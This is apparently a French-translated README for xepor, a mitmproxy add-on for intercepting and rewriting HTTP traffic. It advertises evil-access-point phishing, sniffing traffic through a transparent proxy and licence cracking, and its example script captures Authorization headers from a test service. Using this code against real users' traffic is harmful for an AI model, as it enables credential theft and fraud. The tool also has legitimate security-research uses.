xepor

Xepor (prononcé /ˈzɛfə/ , zephyr) est un framework de routage Web destiné à l'ingénierie inverse et aux chercheurs en sécurité. Il fournit une API de type Flask permettant aux pirates informatiques d'intercepter et de modifier les requêtes HTTP et/ou les réponses HTTP dans un style de codage convivial.

Ce projet est destiné à être utilisé avec mitmproxy. Les utilisateurs écrivent des scripts avec xepor et exécutent le script dans mitmproxy avec mitmproxy -s your-script.py .

Si vous souhaitez passer du PoC à la production, de la démo (par exemple http-reply-from-proxy.py, http-trailers.py, http-stream-modify.py) à quelque chose que vous pourriez retirer avec votre WiFi Pineapple, alors Xépor est fait pour vous !

1. Codez tout avec @api.route() , tout comme Flask ! Écrivez tout dans un seul script et non if..else plus.
2. Gérez plusieurs routes d'URL, même plusieurs hôtes dans une seule instance InterceptedAPI .
3. Pour chaque route, vous pouvez choisir de modifier la requête avant de vous connecter au serveur (ou même de renvoyer une fausse réponse sans connexion en amont), ou de modifier la réponse avant de la transmettre à l'utilisateur.
4. Mode liste noire ou mode liste blanche. Autorisez uniquement les points de terminaison d'URL définis dans les scripts à se connecter en amont, en bloquant tout le reste (dans des domaines spécifiques) avec HTTP 404. Convient pour le proxy transparent.
5. Définition du chemin d'URL lisible par l'homme et correspondance optimisée par l'analyse
6. Remappage de l'hôte. définissez des règles pour rediriger vers les véritables en amont de vos faux hôtes. La correspondance Regex est prise en charge. Idéal pour le décapage SSL et le craquage de licence côté serveur !
7. Et tout le meilleur de mitmproxy ! TOUS les modes de fonctionnement ( mitmproxy / mitmweb + regular / transparent / socks5 / reverse:SPEC / upstream:SPEC ) sont entièrement pris en charge.

1. AP maléfique et phishing via MITM.
2. En reniflant le trafic du périphérique cible par iptables + proxy transparent, modifiez la charge utile avec xepor à la volée.
3. Crackage d'une licence logicielle basée sur le cloud. Voir examples/krisp/ comme exemple.
4. Écrivez un robot d'exploration Web complexe en environ 100 lignes de code . Voir examples/polyv_scrapper/ comme exemple.
5. ... et bien d'autres encore.

La suppression SSL n'est PAS fournie par ce projet.

pip install xepor

Prenez le script de examples/httpbin comme exemple.

mitmweb -s example/httpbin/httpbin.py

Définissez le proxy HTTP de votre navigateur sur http://127.0.0.1:8080 et accédez à l'interface Web à l'adresse http://127.0.0.1:8081/.

Envoyez une requête GET depuis http://httpbin.org/#/HTTP_Methods/get_get , vous pourrez alors voir la modification apportée par Xepor dans l'interface mitmweb, les outils de développement du navigateur ou Wireshark.

Le httpbin.py fait deux choses.

1. Lorsque l'utilisateur accède à http://httpbin.org/get, injectez un paramètre de chaîne de requête payload=evil_param dans la requête HTTP.
2. Lorsque l'utilisateur accède à http://httpbin.org/basic-auth/xx/xx/ (nous faisons simplement semblant de ne pas connaître le mot de passe), reniflez les en-têtes Authorization des requêtes HTTP et imprimez le mot de passe à l'attaquant.

Exactement ce que mitmproxy fait toujours, mais avec du code écrit à la manière xepor .

 # https://github.com/xepor/xepor-examples/tree/main/httpbin/httpbin.py
from mitmproxy . http import HTTPFlow
from xepor import InterceptedAPI , RouteType


HOST_HTTPBIN = "httpbin.org"

api = InterceptedAPI ( HOST_HTTPBIN )


@ api . route ( "/get" )
def change_your_request ( flow : HTTPFlow ):
    """
    Modify URL query param.
    Test at:
    http://httpbin.org/#/HTTP_Methods/get_get
    """
    flow . request . query [ "payload" ] = "evil_param"


@ api . route ( "/basic-auth/{usr}/{pwd}" , rtype = RouteType . RESPONSE )
def capture_auth ( flow : HTTPFlow , usr = None , pwd = None ):
    """
    Sniffing password.
    Test at:
    http://httpbin.org/#/Auth/get_basic_auth__user___passwd_
    """
    print (
        f"auth @ { usr } + { pwd } :" ,
        f"Captured { 'successful' if flow . response . status_code < 300 else 'unsuccessful' } login:" ,
        flow . request . headers . get ( "Authorization" , "" ),
    )


addons = [ api ]